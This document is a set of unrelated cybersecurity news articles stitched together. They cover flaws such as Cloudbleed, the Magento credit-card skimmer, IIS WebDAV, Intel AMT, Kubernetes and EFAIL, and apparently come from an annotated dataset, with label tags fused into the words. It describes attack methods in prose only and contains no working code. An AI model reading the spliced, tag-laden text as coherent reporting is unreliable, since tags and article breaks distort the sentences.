that it was previously trivial to create an SSL certificate collision thanks to Kaspersky using only the first 32 bits of an MD5 hash in its SSL proxy packaged with its Anti-Virus product . `` You do n't have to be a cryptographer to understand a 32-bit key is not enough to prevent brute-forcing a collision in seconds , '' Tavis Ormandy of Project Zero said in its issue tracker . `` They effectively proxy SSL connections , inserting their own certificate as a trusted authority in the system store and then replace all leaf certificates on the fly . This is why if you examine a certificate when using Kaspersky Anti-Virus , the issuer appears to be 'Kaspersky Anti-Virus Personal Root ' , '' he said . `` It seems incredible that Kaspersky have n't noticed that they sometimes get certificate errors for mismatching commonNames just by random chance . After Ormandy reportedVulnerability-related.DiscoverVulnerabilitythe bug and received acknowledgementVulnerability-related.DiscoverVulnerabilityfrom Kaspersky on November 1 , despite learning the security vendor was doing some commonName checks , the bug was still able to be exploitedVulnerability-related.DiscoverVulnerability. `` If you 're not being attacked , you would see random errors . A MITM [ man in the middle ] can send you packets from where you were expecting , '' Ormandy said on Twitter . Ormandy also foundVulnerability-related.DiscoverVulnerabilityanother bug on November 12 that allowed any unprivileged user to become a local certificate authority . In May last year , the Project Zero security researcher discoveredVulnerability-related.DiscoverVulnerabilitythat Symantec Antivirus Engine was vulnerable to buffer overflow when parsing malformed portable-executable header files that resulted in instant blue-screening and kernel memory corruption without user action on Windows . `` This is about as bad as it can possibly get , '' Ormandy said at the time . Because Symantec use a filter driver to intercept all system I/O , just emailing a file to a victim or sending them a link is enough to exploit it .
Attackers continue to take aim at the e-commerce platform Magento . Researchers said last week they came across a malicious function snuckAttack.Databreachinto one of the platform ’ s modules in order to stealAttack.Databreachcredit card information . Code for the function was injected into a .php file for SF9 Realex , a module that helps sites store customer credit card data for the one-click checkout functionality commonly used by repeat customers . The module interacts with the Realex RealAuth Remote and Redirect systems , “ very popular solutions in the Magento community , ” according to Bruno Zanelato , a researcher with the firm Sucuri , who foundVulnerability-related.DiscoverVulnerabilitythe malicious function . The function , sendCCNumber ( ) , reroutes credit card information entered by a customer from Magento to an attacker ’ s email address , hidden inside a variable later in the code . The data , encoded in JSON , arrives in the attacker ’ s inbox without the victim being any the wiser . According to researchers , the attacker uses binlist.net , a public web service for searching issuer identification numbers ( IIN ) , to help identify which bank each card is associated with . Zanelato said Friday that attackers are going greater lengths to target credit card data , especially in e-commerce platforms like Magento . “ Magento credit card stealers are indeed on the rise , ” Zanelato wrote Friday , “ While the information here is specific to Magento , realize that this can affect any platform that is used for ecommerce . As the industry grows , so will the specific attacks targeting it ” . Zanelato is quick to point outVulnerability-related.DiscoverVulnerabilitythat there wasn ’ t a vulnerability in Magento that enabled the theft of credit card data . From there the attacker was able to inject script and takeover SF9 Realex . It ’ s the latest in a line of credit card stealers Sucuri researchers have observed taking advantage of Magento , however . Last summer Cesar Anjos , a researcher with the firm looked at one stealer that was loaded from another source . The stealer essentially performedAttack.Databreacha man-in-the-middle attack between the user and the checkout page after credit card information was entered . Last October , Ben Martin , a different researcher with the firm , discovered attackers scrapingAttack.Databreachcredit card numbers and exfiltratingAttack.Databreachthem in obscure , sometimes publicly viewable image files . Researchers with RiskIQ monitored attacks similar to ones described by Sucuri last year . The firm said the attacks it had been monitoring originated from a single hacking group targeting e-commerce platforms such as Powerfront CMS and OpenCart with a web-based keylogger in March 2016
Bad as Cloudbleed is , there ’ s no evidence attackers exploitedVulnerability-related.DiscoverVulnerabilityit before the patch was deployedVulnerability-related.PatchVulnerability. But since the vulnerability was triggered more than 1.2m times from 6,500 sites , Cloudflare is taking no chances : the company has tapped an outside company , Veracode , to scour its code . CEO Matthew Prince pledged the external review as he set out a detailed update after 12 days of investigation . That update includes a synopsis of how the vulnerability was created and who faced the most risk . He said Cloudflare continues to work with Google and others to eliminate all leaked data from memory : We ’ ve successfully removed more than 80,000 unique cached pages . That underestimates the total number because we ’ ve requested search engines purge and re-crawl entire sites in some instances . Cloudbleed is a serious vulnerability in Cloudflare ’ s internet infrastructure that Google Project Zero researcher Tavis Ormandy discoveredVulnerability-related.DiscoverVulnerabilityin mid-February . It turned out that a single character in Cloudflare ’ s code caused the problem . In its initial blog post on the matter , Cloudflare said the issue stemmed from its decision to use a new HTML parser called cf-html . In his update , Prince said Cloudbleed was triggered when a page with two characteristics was requested through Cloudflare ’ s network
Samsung ’ s televisions and wearables reportedly haveVulnerability-related.DiscoverVulnerabilityserious vulnerabilities that could allow malicious hackers to remotely take control of them . Security researchers in Israel have uncoveredVulnerability-related.DiscoverVulnerability40 previously undiscovered vulnerabilities in the operating system running in Samsung ’ s line of smart televisions , smartwatches , and even mobile phones , which could give hackers easy access to the devices , Motherboard is reportingVulnerability-related.DiscoverVulnerabilityafter discussing the findingsVulnerability-related.DiscoverVulnerabilitywith the researchers . Tens of millions of electronics could be at risk , security researcher Amihai Neiderman told Motherboard . The security flaws are living insideVulnerability-related.DiscoverVulnerabilityTizen , an operating system Samsung ( SSNLF ) has been developing over the last several years that runs on the company ’ s televisions , smartwatches , and some low-powered mobile devices . Hackers with knowledge of the vulnerabilities can be half a world away but connect over the Internet to a Samsung television or wearable , and assume complete control over the device . Neiderman didn ’ t say if hackers have been exploiting some of the flaws built into Tizen , and he has only been analyzing the software for the past eight months . He believes that many of the 40 flaws—called zero day exploits because there are no fixes and hackers could take advantage of them right now—were caused by Samsung coding errors that were never discoveredVulnerability-related.DiscoverVulnerabilityin product testing
A coalition of some of the globe ’ s top researchers and cryptographers are pleading with The Guardian to retract a story it published last week in which it suggestedVulnerability-related.DiscoverVulnerabilitythe encrypted messaging app WhatsApp contained a backdoor . The article , citing research by Tobias Boelter , a cryptography and security researcher , accusedVulnerability-related.DiscoverVulnerabilityWhatsApp of having a backdoor that it or Facebook could use to eavesdrop on user messages . The article , published by the media group last Friday , was almost immediately met with criticism , first from WhatsApp – which called the allegations false – then from a collection of researchers who also refuted the claims .
In a disclosureVulnerability-related.DiscoverVulnerabilityon March 27 that included their own simple Python proof-of-concept , the researchers outlinedVulnerability-related.DiscoverVulnerabilitythe “ buffer overflow in the ScStoragePathFromUrl function in the WebDAV service ” when an attacker sends an overlong IF header request as part of a PROPFIND request ( if that sounds obscure you can read about WebDAV here ) . DesignatedVulnerability-related.DiscoverVulnerabilityCVE-2017-7269 , that ’ s bad news , but the fact that it has been knownVulnerability-related.DiscoverVulnerabilityabout for months – with new exploits now likely – is the main takeaway . Given that IIS 6.0 shipped with Windows Server 2003 R2 in 2005 and Microsoft stopped supporting it after the end of life deadline passed in July 2015 ( ie no more patches ) , one might assume that the install base is small . More likely , this is another version of the Windows XP situation where organisations find it hard to wean themselves off core software and end up putting themselves at risk . In 2015 , research from analysts RiskIQ found 2,675 installs of IIS 6.0 inside 24 of the top FTSE-100 UK companies alone . Incredibly , the same analysis found 417 installs of IIS 5.0 in the same companies , which at that time was a year beyond extended support death . Shodan estimates 600,000 machines still visibly running this software globally , perhaps 10 % of which have the PROPFIND extension running according to an analysis by one enterprising researcher . Nobody knows , but with Microsoft unlikely to step inVulnerability-related.PatchVulnerabilitywith a fix , it could be more than enough to cause problems . The premium fix is to stop using IIS 6.0 immediately but for anyone who finds that difficult there is one hope : guerrilla patchingVulnerability-related.PatchVulnerability. We discussed this phenomenon in our recent coverage of Google ’ s “ Operation Rosehub ” , but it can be summed up by the simple idea that if the vendor in whose software a vulnerability has arisen can ’ t or won ’ t fixVulnerability-related.PatchVulnerabilitythe issue then someone else does it for them . A company called Acros Security dubbed this the “ 0patch ” and , lo and behold , has come upVulnerability-related.PatchVulnerabilitywith a “ micro-patch ” for CVE-2017-7269 . We can ’ t vouch for this but Acros explains how developed this in some detail for anyone staring down the barrel of limited options . What the latest episode challenges is the fixed idea of software lifecycles according to big software vendors , which runs something like “ we ’ ve told them in advance that support will be removed by a given date so if they don ’ t follow our advice and upgrade then that ’ s their lookout ” . The near debacle of XP ’ s zombie afterlife was an example of this MO running aground on the rocks of business reality , beside which the latest IIS 6.0 event might look modest . But an unpatchable zero-day affectingVulnerability-related.DiscoverVulnerabilityhundreds of thousands of compromised web servers won ’ t be fun for anyone – Microsoft included
Google Nest ’ s Dropcam , Dropcam Pro , Nest Cam Outdoor and Nest Cam Indoor security cameras can be easily disabled by an attacker that ’ s in their Bluetooth range , a security researcher has foundVulnerability-related.DiscoverVulnerability. The vulnerabilities are present inVulnerability-related.DiscoverVulnerabilitythe latest firmware version running on the devices ( v5.2.1 ) . They were discoveredVulnerability-related.DiscoverVulnerabilityby researcher Jason Doyle last fall , and their existence responsibly disclosedVulnerability-related.DiscoverVulnerabilityto Google , but have still not been patchedVulnerability-related.PatchVulnerability. The first two flaws can be triggered and lead to a buffer overflow condition if the attacker sends to the camera a too-long Wi-Fi SSID parameter or a long encrypted password parameter , respectively . That ’ s easy to do as Bluetooth is never disabled after the initial setup of the cameras , and attackers ( e.g . burglars ) can usually come close enough to them to perform the attack . Triggering one of these flaws will make the devices crash and reboot . The third flaw is a bit more serious , as it allows the attacker to force the camera to temporarily disconnect from the wireless network to which it is connected by supplying it a new SSID to connect to . If that particular SSID does not exist , the camera drops its attempt to associate with it and return to the original Wi-Fi network , but the whole process can last from 60 to 90 seconds , during which the camera won ’ t be recording . Unfortunately , Bluetooth can ’ t be disabled on these cameras , so there is little users can do to minimize this particular risk . Nest has apparently already preparedVulnerability-related.PatchVulnerabilitya patch but hasn’t pushed it outVulnerability-related.PatchVulnerabilityyet . It is supposedly scheduled to be releasedVulnerability-related.PatchVulnerabilitysoon , but no definite date has been offered
Valentine ’ s Day is fast-approaching and the story goes that if Cupid hits you with his golden arrow you ’ ll fall madly in love . But there are other actors taking aim at you on Valentine ’ s Day whose arrows you need to avoid as the outcomes aren ’ t nearly as desirable . Think back to early February 2016 , when many online florists experienced a surge in traffic that wasn ’ t due simply to a rush to buy flowers . Dozens of florists were hitAttack.Ransomby targeted DDoS attacks during their busiest time of the year , causing problems for some and knocking others offline who were asked to pay a ransomAttack.Ransombefore they could resume operations . It ’ s fairly typical for bad actors to escalate extortion-based campaignsAttack.Ransomduring seasonal events when the stakes for targets are high . Looking to profit with minimal investment , attackers exploit known vulnerabilities as they attempt to breach systems . For example , the 2016 Valentine ’ s Day DDoS attacks used Shellshock , a critical vulnerability that ’ s present inVulnerability-related.DiscoverVulnerabilityLinux , UNIX and Mac OS X that had been discoveredVulnerability-related.DiscoverVulnerabilitymore than a year earlier . Of course , online florists are not alone when it comes to being targeted by cyber criminals . Different times of the year and major news events can trigger a surge in attacks aimed at particular industries and geographies . Organisations need to understand their threat model and apply security processes as appropriate . Threat actors will continue to take advantage of events to launch attacks , but you can avoid their arrows this Valentine ’ s Day .
A particular TP-Link router model will spew out its admin password in cleatext to anyone that sends an SMS message to the router 's SIM card with a particular script inside , according to German security researcher Jan Hörsch , who sharedVulnerability-related.DiscoverVulnerabilityhis findings with German newspaper Heise.de . The vulnerability affectsVulnerability-related.DiscoverVulnerabilityTP-Link model M5350 , a 3G mobile Wi-Fi router , often distributed by mobile telco providers to their customers , along with a SIM card they insert in the router . This SIM card allows the router to connect to the mobile operator 's network , and just like any SIM card , has its own telephone number . In an online conversation with Bleeping Computer , Hörsch , who 's a researcher for German cyber-security firm Securai , says that after he analyzed the router 's firmware , he discoveredVulnerability-related.DiscoverVulnerabilitya vulnerability in the feature that handles incoming SMS messages . By sending the following SMS , the router would answer back with the admin account password , the Wi-Fi network SSID , and the Wi-Fi network 's password . The issue is n't as dangerous as it sounds , mainly because the attacker needs to know the router SIM card 's phone number in order to exploit it , Hörsch told Bleeping Computer . This issue is one of many the researcher discoveredVulnerability-related.DiscoverVulnerabilityin recent months in various devices . His findings were summarized and presented in a talk at the recently concluded Kaspersky Security Analyst Summit ( SAS ) , held last week . In the same talk , Hörsch also presentedVulnerability-related.DiscoverVulnerabilityseveral other vulnerabilities that allowed him to obtain root access to Hootoo Travelmate and Trendnet TEW714TRU routers and Vstarcam webcams . Other vulnerabilities the researcher discoveredVulnerability-related.DiscoverVulnerabilityand presentedVulnerability-related.DiscoverVulnerabilityat SAS include the presence of a hardcoded Telnet password in Startech modems , and a very simple to exploit authentication bypass for Panasonic BM ET200 retina scanners , which allowed anyone access to the admin panel just by deleting a few parameters in an URL . His presentationVulnerability-related.DiscoverVulnerabilityalso detailedVulnerability-related.DiscoverVulnerabilityseveral flaws in Western Digital MyCloud NAS hard drives , some of which were made public at the start of March by another researcher who disclosedVulnerability-related.DiscoverVulnerabilitythe bugs .
Google has announcedVulnerability-related.DiscoverVulnerabilitya crackdown on intrusive pop-up advertisements on its Chrome web browser after a previous update failedVulnerability-related.PatchVulnerabilityto stop them . The ads open users up to phishing attacksAttack.Phishingthat attempt to scamAttack.Phishingpeople into giving private information such as bank details to online fraudsters . Google says the ads create an 'abusive experience for users ' , including fee messages , unexpected clicks , phishing attemptsAttack.Phishingand misleading site behaviour . The firm tried to stopVulnerability-related.PatchVulnerabilitymanipulative adverts in an update last February but now admits that it 'did not go far enough ' . Chrome currently has an option to enable a pop-up blocker but fraudsters have quickly found ways around this . The company declined to name the companies involved in the crackdown but said that the update will blockVulnerability-related.PatchVulnerabilityads from a 'small number of sites with persistent abusive problems ' . Pop-ups are small windows that tend to show system warnings which are difficult to close , as well as 'watch video ' buttons . When the company announced its previous crackdown back in February , critics were quick to point out that the firm wanted to make ads more tolerable - so that their own could get past filters . Some said that the aim was to persuade people to disable their ad block so as not to deprive publishers ( including Google ) from displaying their advertisements and thus depriving them of revenue . Although they did not go into detail about why the previous block did n't work , Chrome product manager Vivek Sekhar said : 'We 've learned since then that this approach did not go far enough . ' 'In fact , more than half of these abusive experiences are not blocked by our current set of protections , and nearly all involve harmful or misleading ads . ' Advertisements also tend to be a hotbed for malicious software or scams where fraudsters trickAttack.Phishingpeople into giving out their personal information . Once a pop-up is clicked on , the ad can take you to a separate web page asking you to download an application and actually triggers an onslaught of more pop-up ads
Last week , Intel revealedVulnerability-related.DiscoverVulnerabilitythat a serious security flaw in some of its chips left potentially thousands of devices vulnerable to attackers . Then , security researchers revealedVulnerability-related.DiscoverVulnerabilitythe problem was way worse than anyone initially thought as the vulnerability could allow attackers to remotely `` hijack '' affected machines . It 's still not clear just how many devices are impactedVulnerability-related.DiscoverVulnerabilityas Intel has't said , but some in the industry have put the number as high as 8,000 . Here 's a look at what you need to know and how to protect yourself . The vulnerability stems from something called Intel Active Management Technology , ( AMT ) , a technology that allows devices to be remotely managed to make it easier to update software and perform maintenance remotely . It 's a feature typically used by businesses that may be responsible for many devices that may not all be in the same place . Since the technology is integrated at a chip level , AMT can do a bit more than other software-enabled management tools . Using AMT 's capabilities , for instance , a system administrator could remotely access and control a computer 's mouse and keyboard , or turn on a computer that 's already been powered down . While those can be helpful capabilities for corporate IT departments to have , it 's obviously the type of access you 'd want locked down pretty tightly . And that 's just the problem . Security researchers found that AMT 's web portal can be accessed with just the user admin and literally any password or even no password at all . That 's why some have labeled it a `` hijacking '' flaw since anyone who exploits the vulnerability would be able to remotely control so many processes . Most importantly , the flaw does n't impactVulnerability-related.DiscoverVulnerabilityevery Intel chip out there . Since it 's rooted inVulnerability-related.DiscoverVulnerabilityAMT , the vulnerability primarily affectsVulnerability-related.DiscoverVulnerabilitybusinesses , though , as Intel points out , some consumers use computers made for businesses . One of the easiest ways to check if you might be affected is to check that Intel sticker that comes on so many PCs . Look for a `` VPro '' logo as that indicates the presence of AMT . Of course , looking for a sticker is hardly foolproof . Intel has also released a downloadable detections guide , which will guide you through the process of checking your machines . You can find the detection guide here . Though Intel has long supplied Apple with chips for Macs , AMT is only present on processors in Windows-based machines , so all Macs are safe from this particular exploit . If you do have a machine that 's impacted by the security flaw , you 'll need to update your firmware as soon as possible . Intel has already createdVulnerability-related.PatchVulnerabilitya patch and is now waiting on manufacturers to make it availableVulnerability-related.PatchVulnerability. Some , including Dell , Lenovo , HP , and Fujitsu , have already rolled it out . You can find links to those over on Intel 's website , which will be updatedVulnerability-related.PatchVulnerabilityas more manufacturers releaseVulnerability-related.PatchVulnerabilityupdates .
The site now includes a malicious link that infects the computers of anyone visiting , Arctos contends . Palani Bala , Arctos ' CTO , claims that HPCL 's site was compromised by a series of attacks by the pseudo-Darkleech campaign , which exposes users to Nemucod malware that , in turn , downloads Cerber ransomware onto their machines . Darkleech is a long-running campaign that uses exploit kits to deliver malware . The executable downloaded logs delivered by exploit kits were analyzed through a behavior analysis engine , which identified the executable file as Cerber ransomware based on behavior classification , Bala says . Landing page deobfuscated by Arctos Ateles engine . Source : Arctos Threat Research Co. Bala claims the attackers run automated bots that look for vulnerable sites and then tamper with them by adding additional content that delivers malware to visitors ' computers . Experts say hackers using Cerber ransomware usually demandAttack.Ransom$ 1,000 in bitcoin from infected users . Cerber ransomware and its encryption components are updated daily on the site , he adds . First appearing in March 2016 , Cerber often contains an audio file with a ransom message . The ransomware largely spreads via spear-phishing campaignsAttack.Phishing, security experts say . Arctos suspectsVulnerability-related.DiscoverVulnerabilitythe HPCL attackers ' bot might have exploitedVulnerability-related.DiscoverVulnerabilityvulnerabilities in an old Apache web-server or any additional services/plug-ins running in the server , Bala says . He recommends that HPCL 's webserver infrastructure perimeter be protected around the clock by advanced security monitoring solutions to detect such compromises . In the meantime , it 's time CERT-In made a recommendation to HPCL and others on how to avoid infections .
The Bitcoin Core team yesterday releasedVulnerability-related.PatchVulnerabilitya patch for a DDoS vulnerability that could prove fatal to the Bitcoin network . The patch note urged miners to shut down their older versions urgently and replaceVulnerability-related.PatchVulnerabilitythem with the new version , Bitcoin Core 0.16.3 . The announcement , first reported on Hacked , revealedVulnerability-related.DiscoverVulnerabilitythat all the recent Bitcoin Core versions could be vulnerableVulnerability-related.DiscoverVulnerabilityto Distributed Denial-of-Service attack . An attack of such kind typically involves multiple compromised systems to flood a single system ( or network ) – similar to zombies encircling an uninfected person and disabling his movements . DDoS perpetrators could attack a Bitcoin network by either flooding the block with duplicate transactions , thus jamming the transaction confirmation of other people , or by flooding the nodes on Bitcoin ’ s peer-to-peer network , thus over-utilizing the bandwidth through malicious transaction relays . The recent DDoS vulnerability , termed asVulnerability-related.DiscoverVulnerabilityCVE-2018-17144 , tried to attempt the latter – flooding full node operators with traffic . Hacked reports : “ The way the potential exploit could work was by allowing anyone who was capable of mining a sufficient number of proof of work blocks to crash Bitcoin Cores running software versions 0.14.0 to 0.16.2. ” It also means that the miners who occasionally run Bitcoin Core were not vulnerableVulnerability-related.DiscoverVulnerabilityto the attack . Still , developers recommendedVulnerability-related.PatchVulnerabilityall the miners to go ahead with the latest update to stay safe . Also , the patch fixedVulnerability-related.PatchVulnerabilitysome other minor bugs related to consensus , RPC , invalid flag errors , and documentation . It is worth noticing that Bitcoin is not the only cryptocurrency that is on the DDoS attackers ’ hitlist . Flaws have been foundVulnerability-related.DiscoverVulnerabilityin other cryptocurrency clients as well , including Bitcoin Cash and Ethereum . An effective attack on the Ethereum network lasted more than a month and created million of dead accounts . In response , developers had to go through two on-chain forks and one off-chain process to clean up the mess . In another DDoS attack that slowed down the Ethereum network , miners had to increase gas fees to repel the attackers . There was no consensus failure . DDoS continues to be a global problem that impacts all spheres of the internet . Europol in its latest investigative report noted : “ Criminals continue to use Distributed-Denial-of-Service ( DDoS ) attacks as a tool against private business and the public sector . Such attacks are used not only for financial gains but the ideological , political or purely malicious reason . This type of attack is not only one of the most frequent ( second only to malware in 2017 ) ; it is also becoming more accessible , low-cost and low-risk. ” Meanwhile , decentralized networks like Bitcoin are still more secure against such attacks purely because single entities would not be able to bring them down . Also , because the people , including the attackers themselves , are heavily invested in Bitcoin , a coordinated attack would just rip them off their bitcoin validation commissions .
Microsoft has seenVulnerability-related.DiscoverVulnerabilityits share of issues as of late , and now a seemingly simple patch is causing serious issues to certain laptops running the 2016 Anniversary Update . The update was originally releasedVulnerability-related.PatchVulnerabilityto prevent a zero-day attack on IE . Per Microsoft , this was the issue being fixedVulnerability-related.PatchVulnerability: A remote code execution vulnerability exists inVulnerability-related.DiscoverVulnerabilitythe way that the scripting engine handles objects in memory in Internet Explorer . The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user . An attacker who successfully exploitedVulnerability-related.DiscoverVulnerabilitythe vulnerability could gain the same user rights as the current user . If the current user is logged on with administrative user rights , an attacker who successfully exploitedVulnerability-related.DiscoverVulnerabilitythe vulnerability could take control of an affected system . An attacker could then install programs ; view , change , or delete data ; or create new accounts with full user rights . In a web-based attack scenario , an attacker could host a specially crafted website that is designedAttack.Phishingto exploit the vulnerability through Internet Explorer and then convinceAttack.Phishinga user to view the website , for example , by sendingAttack.Phishingan email . The security update addressesVulnerability-related.PatchVulnerabilitythe vulnerability by modifying how the scripting engine handles objects in memory . But now that fix is causing a pretty big problem of its own : it ’ s preventing certain laptops from booting . The affected machines are part of a pretty small bunch—only Lenovo laptops with less than 8 GB of RAM running the 2016 Anniversary Update ( 1607 ) —but it ’ s still a pretty bad problem to have . Fortunately , there ’ s a way to bypass the failed boot by restarting into the UEFI and disabling Secure Boot . It ’ s also noted that if BitLocker is enabled that you may have to go through BitLocker recovery after disabling Secure Boot . On the upside , Microsoft is working with Lenovo to correctVulnerability-related.PatchVulnerabilitythe issue and will releaseVulnerability-related.PatchVulnerabilitya fix sometime in the future . I just wouldn ’ t count on it before the end of the year . Until then , be careful when updating devices , especially if they happen to be Lenovo laptops with limited RAM .
A design flaw affectingVulnerability-related.DiscoverVulnerabilityall in-display fingerprint sensors – that left over a half-dozen cellphone models vulnerable to a trivial lock-screen bypass attack – has been quietly patchedVulnerability-related.PatchVulnerability. The flaw was tied to a bug in the popular in-display fingerprint reader technology used for user authentication . In-display fingerprint reader technology is widely considered an up-and-coming feature to be used in a number of flagship model phones introduced in 2019 by top OEM phone makers , according to Tencent ’ s Xuanwu Lab which is credited for first identifyingVulnerability-related.DiscoverVulnerabilitythe flaw earlier this year . “ During our research on this , we found all the in-display fingerprint sensor module suffer the same problem no matter where it was manufactured by whatever vendors , ” said Yang Yu , a researcher at Xuanwu Lab . “ This vulnerability is a design fault of in-display fingerprint sensors. ” Impacted are all phones tested in the first half of 2018 that had in-display fingerprint sensors , said Yu . That includes current models of Huawei Technologies ’ Porsche Design Mate RS and Mate 20 Pro model phones . Yu said that many more cellphone manufacturers are impactedVulnerability-related.DiscoverVulnerabilityby the issue . However , Yu would not specify other impacted vendors or models : “ Vendors differ greatly in the attitude to security issues , someone have open attitudes , like Huawei , and in contrast , some vendors strongly hope us to keep the voice down on this , ” he told Threatpost . He noted Huawei has been forthcoming , issuingVulnerability-related.PatchVulnerabilitypatches to addressVulnerability-related.PatchVulnerabilitythe issue . Other phones that use the feature include Vivo Communication Technology ’ s V11 Pro , X21 and Nex ; and OnePlus ’ 6T and Xiaomi Mi 8 Explorer Edition phones . Vivo , OnePlus and Xiaomi did not respond to requests for comment from Threatpost . In-display fingerprint readers based on optical fingerprint imaging , experts believe , will soon replace conventional authentication based on capacitance-sensor fingerprint scanners . In-display readers allow for a user to place a finger on the screen of a smartphone where a scanner from behind the display can verify a fingerprint , authenticate the user and unlock the phone . Design-wise the feature allows phones to be sleeker and less cluttered , supporting infinity displays . Usability advantages include the ability to unlock the phone simply by placing your finger on the phone ’ s screen at any angle , whether it ’ s sitting on a table or in a car mount . The vulnerability , which Huawei issuedVulnerability-related.PatchVulnerabilitya patch ( CVE-2018-7929 ) for in September , can be exploitedVulnerability-related.DiscoverVulnerabilityin a matter of seconds , researchers said . In an exclusive interview with Threatpost on the flaw Yu said all an attacker needs to carry out the attack is an opaque reflective material such as aluminum foil . By placing the reflective material over a residual fingerprint on the phone ’ s display the capacitance fingerprint imaging mechanism can be tricked into authenticating a fingerprint .
Approximately 560,000 people were affected byVulnerability-related.DiscoverVulnerabilitya flaw in the script used to migrate followers to the new archival handles . `` If you were following @ POTUS before 12pET , by end of day you 'd be following * two * accounts : @ POTUS44 ( 44th Admin ) and @ POTUS ( 45th Admin ) , '' Dorsey tweeted . Dorsey apologized forVulnerability-related.DiscoverVulnerabilitythe mistake , and said Twitter has worked to correctVulnerability-related.PatchVulnerabilitythe issue . He did add , however , that the Obama Administration felt it was fair to automatically migrate followers after the transition , since @ POTUS is an institutional account . One of the most visible transfers of executive power happened today on Twitter . The official @ POTUS account was handed off to President Trump , and former-President Obama re-assumed his personal handle , @ BarackObama . ( Trump predictably continued to tweet from his personal account long into the inauguration , however . ) Michelle and I are off on a quick vacation , then we 'll get back to work . But some Twitter users are complaining that despite never following @ POTUS in the first place , the presidential handle is suddenly showing up in their timelines . Somehow , they claim , Twitter had automatically followed it for them . Folks : Check if you 're following GraemeJanuary 21 , 2017 `` I specifically UNFOLLOWED this account earlier today . Yet now I am following it again without having resubscribed , '' one user tweeted . `` @ POTUS turned up in my feed despite me not following , willingly or otherwise , '' said another person . A spokesperson for Twitter told Motherboard they could n't comment on these specific claims , but said that post-inauguration , Twitter automatically migrated the followers of @ POTUS over to the newly created @ POTUS44 account , which acts as an archive for President Obama 's tweets . The same was done for @ FLOTUS44 , belonging to Michelle Obama , and @ VP44 , belonging to former-Vice President Biden . As you can see , both versions have somewhat similar follower counts .
Anyone who uses the popular Cisco WebEx extension for Chrome should update to the latest version pronto . Google security researcher Tavis Ormandy recently discoveredVulnerability-related.DiscoverVulnerabilitya serious vulnerability in the Chrome extension that leaves PCs wide open to attack . The magic string was designed to remotely activate the WebEx browser extension . Once the extension was activated the bad guys could execute malicious code on the target machine . The impact on you at home : It ’ s a good idea for anyone who uses this extension to make sure it ’ s updated to the latest version given the severity of the vulnerability . It ’ s not clear if version 1.0.5 offers any significant protection against the threat Ormandy describes . Apparently , all version 1.0.3 did was offer a pop-up anytime that magic code was used , according to Cloudfare security researcher Filippo Valsorda . That puts the onus on the user to make sure they really want to be using WebEx when that pop-up appears . If you ’ d rather not bother with the extension it ’ s also possible to use a temporary , downloadable desktop program each time you want to use WebEx . That may not be convenient , but it ’ s an alternative . Ormandy ’ s discovery raised enough eyebrows that Mozilla blocked WebEx for Firefox .
A critical vulnerability in Kubernetes open-source system for handling containerized applications can enable an attacker to gain full administrator privileges on Kubernetes compute nodes . Kubernetes makes it easier to manage a container environment by organizing application containers into pods , nodes ( physical or virtual machines ) and clusters . Multiple nodes form a cluster , managed by a master that coordinates cluster-related activities like scaling , scheduling , or updating apps . Each node has an agent called Kubelet that facilitates communication with the Kubernetes master via the API . The number of nodes available in a Kubernetes system can be hundreds and even thousands . Pulling this off is easy on default configurations , where `` all users ( authenticated and unauthenticated ) are allowed to perform discovery API calls that allow this escalation , '' says Jordan Liggitt , staff software engineer at Google . The security bug was discoveredVulnerability-related.DiscoverVulnerabilityby Darren Shepherd , co-founder of Rancher Labs company that provides the Kubernetes-as-a-Service solution called Rancher . Now tracked asVulnerability-related.DiscoverVulnerabilityCVE-2018-1002105 , the flaw is critical , with a Common Vulnerability Scoring System ( CVSS ) score of 9.8 out of 10 . According to the latest version of the vulnerability severity calculator , exploiting the security glitch has low difficulty and does not require user interaction . Red Hat 's OpenShift Container Platform uses Kubernetes for orchestrating and managing containers is also impactedVulnerability-related.DiscoverVulnerabilityby the vulnerability . In an advisory on the matter , the company explains that the flaw can be used in two ways against its products . One involves a normal user with 'exec , ' 'attach , ' or 'portforward ' rights over a Kubernetes pod ( a group of one or more containers that share storage and network resources ) ; they can escalate their privileges to cluster-admin level and execute any process in a container . The second attack method exploits the API extension feature used by ‘ metrics-server ’ and ‘ servicecatalog ’ in OpenShift Container Platform , OpenShift Online , and Dedicated . No privileges are required and an unauthenticated user can get admin rights to any API extension deployed to the cluster . `` Cluster-admin access to ‘ servicecatalog ’ allows creation of service brokers in any namespace and on any node , '' the advisory details . The problem has been addressedVulnerability-related.PatchVulnerabilityin the latest Kubernetes revisions : v1.10.11 , v1.11.5 , v1.12.3 , and v1.13.0-rc.1 . Kubernetes releases prior to these along with the products and services based on them are affectedVulnerability-related.DiscoverVulnerabilityby CVE-2018-1002105 . Red Hat releasedVulnerability-related.PatchVulnerabilitypatches for the OpenShift family of containerization software ( OpenShift Container Platform , OpenShift Online , and OpenShift Dedicated ) and users receivedVulnerability-related.PatchVulnerabilityservice updates they can install at their earliest convenience . The software company warns that a malicious actor could exploit the vulnerability to stealAttack.Databreachdata or inject malicious code , as well as `` bring down production applications and services from within an organization ’ s firewall . ''
Enigmail and GPG Tools have been patchedVulnerability-related.PatchVulnerabilityfor EFAIL . For more up-to-date information , please see EFF 's Surveillance Self-Defense guides . Don ’ t panic ! But you should stop using PGP for encrypted email and switch to a different secure communications method for now . A group of researchers released a paper today that describesVulnerability-related.DiscoverVulnerabilitya new class of serious vulnerabilities in PGP ( including GPG ) , the most popular email encryption standard . The new paper includes a proof-of-concept exploit that can allow an attacker to use the victim ’ s own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim . The proof of concept is only one implementation of this new type of attack , and variants may follow in the coming days . Because of the straightforward nature of the proof of concept , the severity of these security vulnerabilities , the range of email clients and plugins affected , and the high level of protection that PGP users need and expect , EFF is advising PGP users to pause in their use of the tool and seek other modes of secure end-to-end communication for now . Because we are awaiting the response from the security community of the flaws highlighted in the paper , we recommend that for now you uninstall or disable your PGP email plug-in . These steps are intended as a temporary , conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community . There may be simpler mitigations availableVulnerability-related.PatchVulnerabilitysoon , as vendors and commentators develop narrower solutions , but this is the safest stance to take for now . Because sending PGP-encrypted emails to an unpatched client will create adverse ecosystem incentives to open incoming emails , any of which could be maliciously crafted to expose ciphertext to attackers . While you may not be directly affected , the other participants in your encrypted conversations are likely to be . For this attack , it isn ’ t important whether the sender or the receiver of the original secret message is targeted . This is because a PGP message is encrypted to both of their keys . At EFF , we have relied on PGP extensively both internally and to secure much of our external-facing email communications . Because of the severity of the vulnerabilities disclosed today , we are temporarily dialing down our use of PGP for both internal and external email . Our 